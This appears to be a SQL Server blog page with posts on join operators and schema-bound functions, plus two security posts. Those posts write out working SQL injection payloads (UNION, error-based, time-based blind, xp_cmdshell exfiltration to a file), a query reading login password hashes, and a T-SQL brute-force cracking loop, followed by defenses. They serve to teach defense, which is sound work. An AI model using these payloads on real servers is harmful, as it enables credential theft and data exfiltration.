Data with Bert logo

Visualizing Merge Join Internals And Understanding Their Implications

This post is part 2 in a series about physical join operators (be sure to check out part 1 - nested loops joins, and part 3 - hash match joins).

Watch this week's video on YouTube

Merge joins are theoretically the fastest* physical join operators available, however they require that data from both inputs is sorted:

Merge-Join-1

The base algorithm works as follows: SQL Server compares the first rows from both sorted inputs.  It then continues comparing the next rows from the second input as long as the values match the first input's value.

Once the values no longer match, SQL Server increments the row of whichever input has the smaller value - it then continues performing comparisons and outputting any joined records. (For more detailed information, be sure to check out Craig Freedman's post on merge joins.)

This is efficient because in most instances SQL Server never has to go back and read any rows multiple times.  The exception here happens when duplicate values exist in both input tables (or rather, SQL Server doesn't have meta data available proving that duplicates don't exist in both tables) and SQL Server has to perform a many-to-many merge join:

Merge-Join-many-to-many

Note: The image above and the explanation below are "good enough" for understanding this process for practical purposes - if you want to dive into the peek-ahead buffers, optimizations, and other inner workings of this process, I highly recommend reading through Hugo Kornelis's reference on merge joins.

A many-to-many join forces SQL Server to write any duplicated values in the second table into a worktable in tempdb and do the comparisons there.  If those duplicated values are also duplicated in the first table, SQL Server then compares the first table's values to those already stored in the worktable.

What Do Merge Joins Reveal?

Knowing the internals of how a merge join works allows us to infer what the optimizer thinks about our data and the join's upstream operators, helping us focus our performance tuning efforts. 

Here are a few scenarios to consider the next time you see a merge join being used in your execution plan:

  • The optimizer chooses to use a merge join when the input data is already sorted or SQL Server can sort the data for a low enough cost.  Additionally, the optimizer is fairly pessimistic at calculating the costs of merge joins (great explanation by Joe Obbish), so if a merge join makes its way into your plans, it probably means that it is fairly efficient.

  • While a merge join may be efficient, it's always worth looking at why the data coming in to the merge join operator is already sorted:

    • If it's sorted because the merge join is pulling data directly from an index sorted on your join keys, then there is not much to be concerned about.
    • If the optimizer added a sort to the upstream merge join though, it may be worth investigating whether it's possible to presort that data so SQL Server doesn't need to sort it on its own.  Often times this can be as simple as redefining an included index column to a key column - if you are adding it as the last key column in the index then regression impact is usually minor but you may be able to allow SQL Server to use the merge join without any additional sorting required.
  • If your inputs contain many duplicates, it may be worth checking if a merge join is really the most efficient operator for the join.  As outlined above, many-to-many merge joins require tempdb usage which could become a bottle neck!

So while merge joins are typically not the high-cost problem spots in your execution plans, it's always worth investigating upstream operators to see if some additional improvements can be made.

[]{#fastest-exception}

*NOTE: There are always exceptions to the rule.  Merge joins have the fastest algorithm since each row only needs to be read once from the source inputs.  Also, optimizations occurring in other join operators can give those operators better performance under certain conditions.

For example, a single row outer table with an indexed inner table using a nested loops join will outperform the same setup with a merge join because of the inner loops joins' optimizations:

DROP TABLE IF EXISTS T1;
GO
CREATE TABLE T1 (Id int identity PRIMARY KEY, Col1 CHAR(1000));
GO

INSERT INTO T1 VALUES('');
GO

DROP TABLE IF EXISTS T2;
GO
CREATE TABLE T2 (Id int identity PRIMARY KEY, Col1 CHAR(1000));
GO

INSERT INTO T2 VALUES('');
GO 100

-- Turn on execution plans and check actual rows for T2
SELECT *
FROM T1 INNER LOOP JOIN T2 ON T1.Id = T2.Id;

SELECT *
FROM T1 INNER MERGE JOIN T2 ON T1.Id = T2.Id;

*There might also be instances where inputs with many duplicate records that require worktables may be slower than a nested loop join. *

As I mentioned though, I typically find these types of scenarios to be the exceptions when encountering merge joins in the real-world.

Visualizing Nested Loops Joins And Understanding Their Implications

This post is the first in a series about physical join operators (be sure to check out part 2 - merge joins, and part 3 - hash match joins).

Watch this week's video on YouTube

What Physical Join Operators Tell Us

Everyone has their own method of reading an execution plan when performance tuning a slow SQL query.  One of the first things I like to look at are what kind of join operators are being used:

image-1

These three little icons may not seem like the most obvious place to begin troubleshooting a slow query, but with larger plans especially I like starting with a quick glance at the join operators because they allow you to infer a lot about what SQL Server thinks about your data.

This will be a three part series where we'll learn how each join algorithm works and what they can reveal about our upstream execution plan operators.

Nested Loops Join

Nested-Loop-Join-50fps-1

Nested loops joins work like this: SQL Server takes the first value from our first table (our "outer" table - by default SQL Server decides for us which table of the two this will be), and compares it to every value in our second "inner" table to see if they match. 

Once every inner value has been checked, SQL Server moves to the next value in the outer table and the process repeats until every value from our outer table has been compared to every value in our inner table.

This description is a worst case example of the performance of a nested loop join.  Several optimizations exist that can make the join more efficient.  For example, if the inner table join values are sorted (because of an index you created or a spool that SQL Server created), SQL Server can process the rows much faster:

nest-loops-sorted-50fps-2

In the above animation, the inner input is a index sorted on the join key, allowing SQL Server to seek directly to the rows it needs, reducing the total number of comparisons that need to be made

For more in-depth explanations of the internals and optimizations of nested loops joins, I recommend reading this post by Craig Freedman as well as Hugo Kornelis's reference on nested loops.

What Do Nested Loops Joins Reveal?

Knowing the internals of how a nested loops join works allows us to infer what the optimizer thinks about our data and the join's upstream operators, helping us focus our performance tuning efforts. 

Here are a few scenarios to consider the next time you see a nested loops join being used in your execution plan:

  • Nested loops joins are CPU intensive; at worst, every row needs to be compared to every other row and this can take some time.  This means when you see a nested loops join, SQL Server probably thinks that one of the two inputs is relatively small.
  • ... and if one of the inputs is relatively small, great!  If instead you see upstream operators that are moving large amounts of data, you may have a estimation problem going on in this area of the plan and may need to update stats/add indexes/refactor the query to have SQL Server provide better estimates (and maybe a more appropriate join).

  • Nested loops sometimes accompany RID or key lookups.  I always check for one of these because they often leave room for some performance improvements:

    • If a RID lookup exists, it's usually easy enough to add a clustered index to that underlying table to squeeze out some extra performance.
  • If either RID or key lookup exist, I always check what columns are being returned to see if a smaller index could be used instead (by including a column in a key/column of an existing index) or if the query can be refactored to not bring back those columns (eg. get rid of the SELECT *).

  • Nested loops joins do not require data to be sorted on input.  However, performance can improve with an indexed inner data source (see animation above), and SQL Server might choose a more efficient operator if the inputs are both sorted. 

    • At the very least, nested loops joins make me think to check whether the input data isn't sorted because of some upstream transformations, or because of missing indexes.

So while nested loops in your plans will always require more investigation, looking at them and the operators around them can provide some good insight into what SQL Server thinks about your data.

Two Words For Faster Scalar Functions

Watch this week's video on YouTube

WITH SCHEMABINDING optimizations were added all the way back in SQL Server 2005.  So why bother talking about them in 2018?

Because no one is taking advantage of them!

Ok, maybe that's a little unfair.  I'm sure some people advantage of the optimizations, but most code I see posted online that could benefit doesn't include it.  So let's talk about an easy way for some of our non-data-accessing scalar functions to get a performance boost.

WITH SCHEMABINDING

When you create a function or view, you can add the WITH SCHEMABINDING option to prevent any database objects that the view/function uses from being modified.  This is a pretty cool feature which prevents you from making a table or column change that would cause a view/function to break.

And while that's pretty cool functionality on its own, what's even better is that the SQL Server optimizer can do some pretty cool things when it knows one of your non-data accessing scalar functions is schema bound.

For example, let's say we have these two functions.  You'll notice the second one includes the WITH SCHEMABINDING syntax:

DROP FUNCTION IF EXISTS dbo.UDF_RemoveSpaces_NotSchemaBound;
GO
CREATE FUNCTION dbo.UDF_RemoveSpaces_NotSchemaBound(@input VARCHAR(100))
    RETURNS VARCHAR(100)
BEGIN
    RETURN REPLACE(@input,' ','')
END;
GO

DROP FUNCTION IF EXISTS dbo.UDF_RemoveSpaces_SchemaBound;
GO
CREATE FUNCTION dbo.UDF_RemoveSpaces_SchemaBound(@input VARCHAR(100)) 
    RETURNS VARCHAR(100) WITH SCHEMABINDING
BEGIN
    RETURN REPLACE(@input,' ','')
END;
GO

When SQL Server executes a function, by default it checks whether the function has any database objects it needs to access.  For our example functions above, this is a waste of time since neither function accesses any data.

The WITH SCHEMABINDING option forces SQL Server to take note at function creation time whether any data access is occurring.  This allows SQL Server to skip that check at run time and allowing the function to execute significantly faster:

SET STATISTICS IO, TIME ON;

SELECT dbo.UDF_RemoveSpaces_NotSchemaBound('Oh yeah') AS CleanValue
INTO #Temp1
FROM
    (SELECT * FROM master..spt_values WHERE number < 500) t1 
    CROSS JOIN (SELECT * FROM master..spt_values WHERE number < 500) t2;
/*
 SQL Server Execution Times:
   CPU time = 1594 ms,  elapsed time = 1977 ms.
*/

SELECT dbo.UDF_RemoveSpaces_SchemaBound('Oh yeah') AS CleanValue
INTO #Temp2
FROM
    (SELECT * FROM master..spt_values WHERE number < 500) t1 
    CROSS JOIN (SELECT * FROM master..spt_values WHERE number < 500) t2;
/*
SQL Server Execution Times:
   CPU time = 62 ms,  elapsed time = 59 ms.
*/

Take a look at those CPU times: 1594ms vs 62ms!  Since SQL Server saves a LOT of time by not having to verify the underlying data sources (for a more in-depth explanation of how SQL Server checks whether a function accesses data, I highly recommend reading this StackOverflow answer by Paul White).

WITH SCHEMABDINING also has performance optimization for queries that would normally need to implement Halloween Protection as well.  Halloween Protection essentially prevents SQL Server from modifying the same records more than once and usually implemented by the addition of an spool operator to the execution plan:

UPDATE #Temp1 SET CleanValue = dbo.UDF_RemoveSpaces_NotSchemaBound('Oh yeah');
UPDATE #Temp2 SET CleanValue = dbo.UDF_RemoveSpaces_SchemaBound('Oh yeah');

image

In this example, you'll notice our non-schema-bound function introduces a Table Spool while our second schema-bound function forgoes this addition since SQL Server knows there won't be any potential for conflict.

In conclusion, if you have a non-data-accessing scalar function you should always add WITH SCHEMABINDING to reap the benefits of SQL Server's optimizations when available.

Brute Forcing SQL Logins and Passwords

Watch this week's video on YouTube

Following up on last week's post about the different types of SQL injection, this week I want to show how injection can be used to obtain a SQL login and its password.

My goal with today's post is to show how easy it is for someone to do this to your server.  My hope is that if your security practices aren't currently the best, the least you can do is learn and follow the few simple steps at the end of this post to help protect your server.

Iterating the Login

Let's try to guess the current login by iterating over characters one at a time:

SET NOCOUNT ON;

DECLARE 
    @FirstDecimal int = ASCII('!'),
    @LastDecimal int = ASCII('~'),
    @CurrentDecimal bigint = ASCII('!'),
    @SystemUser nvarchar(128) = '',
    @CurrentPosition int = 1;

BEGIN TRY  
    WHILE (1=1)
    BEGIN
        IF ASCII(substring(SYSTEM_USER,@CurrentPosition,1))=@CurrentDecimal 
        BEGIN 
            SET @SystemUser = @SystemUser + CHAR(@CurrentDecimal); 
            SET @CurrentPosition = @CurrentPosition + 1;
            --SELECT 'Letter found: ' + @SystemUser;
        END

        IF @CurrentDecimal = @LastDecimal
        BEGIN
            SET @CurrentDecimal = @FirstDecimal;
        END
        ELSE
        BEGIN
            SET @CurrentDecimal = @CurrentDecimal + 1;
        END

        IF SYSTEM_USER = @SystemUser
        BEGIN
            SELECT @SystemUser AS DiscoveredSystemUser;
            BREAK;
        END
    END
END TRY 
BEGIN CATCH   
    SELECT 
        @SystemUser AS SystemUser,
        ERROR_NUMBER() AS ErrorNumber,
        ERROR_MESSAGE() AS ErrorMessage;  
END CATCH; 

The key to this script is line 13 where we use SUBSTRING() to grab the first letter of SYSTEM_USER and check to see if it equals the current letter we are iterating over (if we could perform a union-based attack and return SYSTEM_USER outright, that of course would be easier).

But having the ability to execute a whole script like that to determine the login in milliseconds is a luxury.  If you are actually injecting code into a dynamic query, a more realistic looking attack might look like this (using our vulnerable stored procedure from last week's demos):

EXEC dbo.USP_GetUserFullName @Username = N'''; IF UPPER(substring(SYSTEM_USER,1,1))=''S'' WAITFOR DELAY ''00:00:05'';--';

Now if the query takes 5 second to return results, we know we found the correct first letter ("S" in this example).  We can repeat this for each subsequent character until we have the whole login.  Easy.

Note: A similar process can be performed for SQL Users as well.

Cracking the Password

Passwords are more work to obtain.  You could start guessing common passwords (eg. "admin", "ilovesql", "", etc...) and trying to use them to login, but once you deplete the easy-to-guess list, you will have to try something else.

A more systematic method requires you to first obtain the login's password hash:

SELECT
      CAST([password] AS VARBINARY(MAX))
      ,[loginname]
  FROM [master].[sys].[syslogins];
  WHERE loginname='sa'

Which returns:

image-3

That first column is SQL Server's hashed version of the login's password.  And while we were able to determine the SQL login character by character, we won't be able to do the same for this hashed password. 

To "crack the hash", what we have to do is guess a password, hash it, and see if it is equal to the hash we found above.  If it doesn't match, we guess another password, hash, check, and repeat until we find the correct password.

The simplest way to do this is to iterate over the entire password space.  The very poorly T-SQL code written below does that for 4 character passwords.  We basically start with guessing a password "!!!!", checking to see if it's hash matches, and if not then moving on to the next character combintation (ie. !!!#", "!!!\$", "!!!%", etc...):

DECLARE 
    @FirstDecimal int = ASCII('!'), /*33 in decimal*/
    @LastDecimal int = ASCII('z'), /*122 in decimal*/
    @PasswordFound bit = 0,
    @Password nvarchar(128) = '',
    @HashedPassword varbinary(MAX) = 0x0200C2455E03ECA51AE88CE6619644D250CD07650C8D13C6992662B7C7C1D085A9D18B3B9AF6E75D1D9DC1E17ADC23C48BB68927A4C670026039BFE948FB4FF367FBDC08365F
DECLARE 
    @DecimalDifference int = @LastDecimal - @FirstDecimal,
    @Char1 int = @FirstDecimal,
    @Char2 int = @FirstDecimal,
    @Char3 int = @FirstDecimal,
    @Char4 int = @FirstDecimal;

BEGIN TRY  
    WHILE (@Char1 <= @LastDecimal AND @PasswordFound = 0)
    BEGIN
        WHILE (@Char2 <= @LastDecimal AND @PasswordFound = 0)
        BEGIN
            WHILE (@Char3 <= @LastDecimal AND @PasswordFound = 0)
            BEGIN
                WHILE (@Char4 <= @LastDecimal AND @PasswordFound = 0)
                BEGIN
                    SET @Password = CHAR(@Char1) + CHAR(@Char2) + CHAR(@Char3) + CHAR(@Char4) 
                    /* for debugging IF @Password = 'admin'  COLLATE Latin1_General_CS_AS */ /*make sure we are doing a case sensitive check */
                    IF PWDCOMPARE(@Password,@HashedPassword) = 1
                    BEGIN
                        SELECT @Password;
                        SET @PasswordFound = 1;
                    END
                    SET @Char4 = @Char4 + 1;
                END
                SET @Char4 = @FirstDecimal;
                SET @Char3 = @Char3 + 1;
            END
            SET @Char4 = @FirstDecimal;
            SET @Char3 = @FirstDecimal;
            SET @Char2 = @Char2 + 1;
        END
        SET @Char4 = @FirstDecimal;
        SET @Char3 = @FirstDecimal;
        SET @Char2 = @FirstDecimal;
        SET @Char1 = @Char1 + 1;
    END
END TRY 
BEGIN CATCH   
    SELECT 
        @Password AS Password,
        ERROR_NUMBER() AS ErrorNumber,
        ERROR_MESSAGE() AS ErrorMessage;  
END CATCH; 

After about 9 minutes, SQL Server returns my very easy to guess sa password in clear text:

image-4

At this point you might be thinking, "9 minutes for a 4 character password!  Doesn't that mean it would take years to crack an 8 character, or 12 character password?"

Yes and no.  T-SQL is not the right tool for the job here.  A better tool would be something that is optimized for hash checking, something like hashcat.

Hashcat performs the same type of looping logic to check an entire address space for a matching hash, but it does so very quickly with lots of optimizations (word lists, prefix/suffix mutations, etc..).  It also multithreads the process and can make use of graphics cards to perform computations even faster.

I don't want to turn this into a "step by step how to use hashcat to crack your SQL logins" post, but be aware that doing so is fairly straightforward.  Also know that GPU optimized cloud machines are easily available, and running hashcat on them easily gets you into the 470 million hashes/second range.

With some back of the napkin calculations, that means your completely random 8 character password would take at most:

(((((96 character subset) ^ (8 character password)) / (470,000,000))/60- minutes)/24 hours) = ~10658 days

Now that may seem like a long time, but remember, that's one machine doing the processing over the entire character space. 

The cloud is easily abused for solving performance problems by spinning up additional hardware.  The same tools you have to run your company's cloud workloads are available to criminals as well.

And hardware is always improving.  Could new hardware come out in the next couple years that will speed this up even more?  Almost certainly.

Finally this is the longest possible time if would take - if your password isn't completely random (uses dictionary words) or the hacker knows something about your password schema (all passwords use only letters and numbers), then it's pretty much game over.

Don't Let This Happen To You

Hopefully you are using at least 8 character, random passwords with a full subset of upper and lowercase letters, numbers, and symbols.  That should be the minimum you should be doing today, knowing full well that this is already probably inadequate, if not today then in the very near future. 

If you aren't using long passwords, then stop reading right now and go figure out how to change this right away.  SQL Server allows you to use passwords up to 128 characters long - make use of  all of those characters!

In addition to using long, random passwords, follow the best practices mentioned in last week's post as well: use the principle of least privilege to restrict as much access to your logins as possible, and prevent SQL injection from allowing important information from leaving your server in the first place.

4 SQL Injection Techniques For Stealing Data

Watch this week's video on YouTube

I'm not advocating that you start using SQL injection to start stealing other people's data.

However, I do think that you should familiarize yourself with the various SQL injection techniques so that you will be better prepared to prevent them from happening in your own queries.

The rest of this post will go over four common techniques used for extracting information from SQLServer, as well as simple solutions to prevent them. 

We'll be looking at all of these techniques directly in SQL Server, but be aware that all of this information is potentially obtainable from an app front-end as well.

UNION-Based Attacks

Perhaps the easiest way for a hacker to retrieve additional data from an injection vulnerable query is through a UNION-based attack.

A UNION-based injection attack adds a UNION or UNION ALL statement to your original stored procedure query, effectively returning any data requested by the second query.

Let's say we have a stored procedure that returns user information for the @Username value passed in:

-- Create our sample table data
CREATE TABLE dbo.Users
(
    Id int IDENTITY(1,1),
    Username NVARCHAR(100),
    FirstName NVARCHAR(100),
    LastName NVARCHAR(100)
);
GO
INSERT INTO dbo.Users VALUES ('BDubs','Bert','Wagner');
INSERT INTO dbo.Users VALUES ('JaneDough', 'Jane', 'Doe');

SELECT * FROM dbo.Users;

-- Create our procedure to retrieve name information
CREATE PROCEDURE dbo.USP_GetUserFullName
    @Username NVARCHAR(100)
AS
BEGIN
    DECLARE @Query NVARCHAR(MAX) = N'
        SELECT
            UserName,
            FirstName,
            LastName
        FROM
            dbo.Users
        WHERE
            Username = ''' + @UserName + N'''';
    EXEC(@Query);
END

This query is poorly written and easily injectable:

-- No injection
EXEC dbo.USP_GetUserFullName @Username = N'BDubs'

-- Injection, returns all rows
EXEC dbo.USP_GetUserFullName @Username = N'BDubs'' OR 1=1--';

Let's pretend we're a nefarious hacker and want to determine what SQL Server logins are available to us on the server.  We can use a UNION-based injection attack to query sys.syslogins to get this information and return it as part of the original query:

EXEC dbo.USP_GetUserFullName @Username = N'BDubs'' UNION ALL SELECT loginname,null,null FROM master.sys.syslogins;--';

image

This union based attack simply concatenates the results of another query to our original row of data.

Error-Based Attacks

Let's say the UNION-based technique doesn't work or we want an alternate way of determining the currently logged in account.

Another option is to have the application reveal information about the database through error output.

We can pass in a query that we know will produce an error, in this case casting a string as an INT:

EXEC dbo.USP_GetUserFullName @Username = N'''; SELECT CAST(SYSTEM_USER AS INT);--';

image-1

Voila! If the application doesn't handle the error message correctly, it will conveniently show the system login as part of the error message.

Out-Of-Band Delivery

The first two techniques we looked at have been in-boundattacks: that is, we used the injectable query to return data to us directly.

But what if there is sufficient security preventing unexpected data from being directly returned to our app?  We have to get the data we want off of the server via other means.

This example uses xp_cmdshell to write our data to a text file, but we could have just as easily used this to send ourselves an email, etc…

EXEC dbo.USP_GetUserFullName @Username = N'''; EXEC xp_cmdshell ''bcp "SELECT * FROM master.sys.syslogins" queryout "%TEMP%\pwned.txt" -c -T -q  --';

image-2

Blind Injection

A secured server may not allow us to directly output the data we want, but that doesn't mean we can't infer certain information.

Normally we pride ourselves in being able to write consistently fast queries. But our dedication to consistently fast executions provides hackers with ways of discerning information without any explicit data output.

For example, let's say we want to guess if the currently logged in account is "sa".  We can write logic to check this and purposely slow the injectable query's execution to determine we our guess is correct:

EXEC dbo.USP_GetUserFullName @Username = N'''; if (SELECT SYSTEM_USER) = ''sa'' waitfor delay ''00:00:05'';--';

If our query with an expected parameter normally returns in milliseconds, forcing a 5-second delay will indirectly inform us that our guessed "sa" account name is correct.

Protecting Yourself

The easiest way to prevent SQL injection is to avoid using dynamic SQL when it's unnecessary. In our example stored procedure above, there is no reason we should be using dynamic SQL -  this should be a parameterized query that is completely safe from injection attacks:

CREATE PROCEDURE dbo.USP_GetUserFullName
    @Username NVARCHAR(100)
AS
BEGIN
    SELECT
        UserName,
        FirstName,
        LastName
    FROM
        dbo.Users
    WHERE
        Username =  @UserName;
END

If you must use dynamic SQL, then execute your programmatically built query string with sp_executesql. This procedure will safely parameterize your inputs and prevent from injection from occurring.

Finally, make sure the accounts executing your queries have as few allowed permissions as possible.  This way, even if your query has an injection vulnerability, the amount of damage an attacker can do is minimal.  Many of the examples above would have failed if our account simply didn't have access to certain system tables or system procedures like xp_cmdshell.

These solutions will not cover every scenario, but they will cover the majority of scenarios and improve our chances of keeping our information secure.